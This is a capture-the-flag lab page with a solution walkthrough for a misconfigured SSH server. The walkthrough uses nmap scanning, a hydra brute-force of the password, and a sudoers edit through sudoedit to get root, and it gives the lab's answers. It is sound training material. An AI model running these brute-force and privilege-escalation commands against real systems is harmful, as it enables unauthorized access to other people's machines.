Lab Icon

Matsudo

🔐 Can you break into this misconfigured server?

Medium 16 May 2024 Free Access Solution Available

Step into the shoes of a penetration tester and tackle this realistic SSH-based challenge. This server might look secure from the outside, but weak credentials and dangerous sudo configurations could be your ticket to complete system compromise. 🎯 Master the art of reconnaissance, brute-force attacks, and privilege escalation in this hands-on Linux exploitation scenario.

2
Flags
40
Points
58%
Success Rate
Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Medium

Matsudo - Complete Solution Walkthrough

Step 1: Network Reconnaissance

  1. Start by scanning the target to identify open ports:
nmap -sS -sV -Pn <target-ip>
  1. The scan reveals that ports 22 (SSH) and 80 (HTTP) are open
  2. Answer to question 1: 22

Step 2: SSH Banner Analysis

  1. Connect to the SSH service to view the banner:
ssh <target-ip>
  1. The banner reveals "Welcome to Charlie's Server"
  2. Answer to question 2: Charlie

Step 3: SSH Brute Force Attack

  1. Based on the banner, we know the username is likely "charlie"
  2. Use hydra to brute-force the SSH password:
hydra -l charlie -P /usr/share/wordlists/rockyou.txt <target-ip> ssh
  1. The attack reveals the password: trustno1
  2. Answer to question 3: hydra (the most commonly used SSH brute-force tool)

Step 4: Initial Access

  1. SSH into the server using the discovered credentials:
ssh charlie@<target-ip>
  1. Enter the password: trustno1
  2. You should now have access to the system as user charlie

Step 5: Privilege Escalation Enumeration

  1. Check sudo privileges for the current user:
sudo -l
  1. This command lists the sudo privileges of the current user
  2. Answer to question 5: sudo -l
  3. The output shows that charlie can run sudoedit on any file

Step 6: Sudoedit Privilege Escalation

  1. The sudoedit permission allows editing files as root
  2. We can exploit this to gain root access by editing /etc/passwd or /etc/sudoers
  3. First, let's get the user flag:
cat /home/charlie/flag-user.txt
  1. For root access, we can exploit the sudoedit vulnerability by editing /etc/sudoers:
sudoedit /etc/sudoers
  1. Add a line to give charlie full sudo access:
charlie ALL=(ALL) NOPASSWD:ALL
  1. Save and exit, then escalate to root:
sudo su -

Step 7: Flag Retrieval

  1. As root, retrieve the root flag:
cat /root/flag-root.txt
  1. You now have both user and root flags, completing the challenge

Security Implications and Lessons Learned

  • Weak Passwords: Using common passwords like "trustno1" makes systems vulnerable to brute-force attacks
  • Sudo Misconfigurations: Granting sudoedit permissions without proper restrictions can lead to privilege escalation
  • Information Disclosure: SSH banners can reveal sensitive information about system owners
  • Defense: Use strong passwords, implement fail2ban, and carefully configure sudo permissions

Tools and Techniques Summary

  • nmap: Network reconnaissance and port scanning
  • hydra: SSH password brute-forcing
  • sudo -l: Enumerating sudo privileges
  • sudoedit: Exploiting sudo misconfigurations for privilege escalation